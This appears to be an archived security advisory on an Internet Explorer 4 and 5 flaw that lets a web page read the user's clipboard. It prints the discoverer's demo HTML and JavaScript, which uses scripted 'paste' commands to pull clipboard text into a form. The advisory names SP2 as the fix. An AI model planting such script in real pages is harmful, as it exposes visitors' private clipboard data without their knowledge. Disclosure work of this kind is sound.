COMMAND

    IE

SYSTEMS AFFECTED

    MS Internet Explorer 4.x

PROBLEM

    Juan Carlos Garcia Cuartango  found following.  He  has discovered
    another IE 4 clipboard  vulnerability.  The clipboard  content can
    be made public by a very simple javascript code.  He reported  the
    problem to Microsoft on Feb 10.   They confirmed the problem.   It
    seems that they were already aware  of the problem and it will  be
    fixed in the next  IE 4 service pack.   The problem is located  in
    the Internet WebBrowser ActiveX object.   More info and a demo  is
    available at:

	http://pages.whowhere.com/computers/cuartangojc
	http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html

    Here's the source:

	<html>

	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
	<meta name="keywords"
	content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">
	<title>The Clipboard vulnerability demo</title>
	</head>

	<body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">
	<script>

	function pt()
	{

	if (document.forms(0).S1.value == "" )
		{
		wb.focus();
		wb.Document.execCommand("paste");
		document.forms(0).S1.value = wb.Document.body.innerText;
		}
	}
	function StartJob()
	{
	document.forms(0).S1.value = "";
	wb.focus();
	wb.Document.execCommand("paste");
	window.setTimeout("pt()",1000);
	}
	</script>

    Further  investigated  of  the  Clipboard  Vulnerabillity  in IE 5
    showed following.  In IE 4 scripted "paste" operations where  only
    allowed if data where  copied by the IE  4 itself.  It  was a good
    security rule.   IE 5 has  changed this security  policy: scripted
    "paste"  is  allowed  for  all  clipboard  origins if the security
    setting "Allow  paste operations  via script"  is set  to "Enable"
    (default setting). We can conclude that clipboard security  police
    is less restrictive in  IE 5 than It  was in IE 4.   The clipboard
    vulnerability Juan reported in  DHTML Edit control exists  in fact
    in  all  the  HTML   <INPUT>  boxes,  just performing a javascript
    command  "document.execCommand("paste");"  the  clipboard  will be
    made public.

SOLUTION

    SP2 for IE will fix that.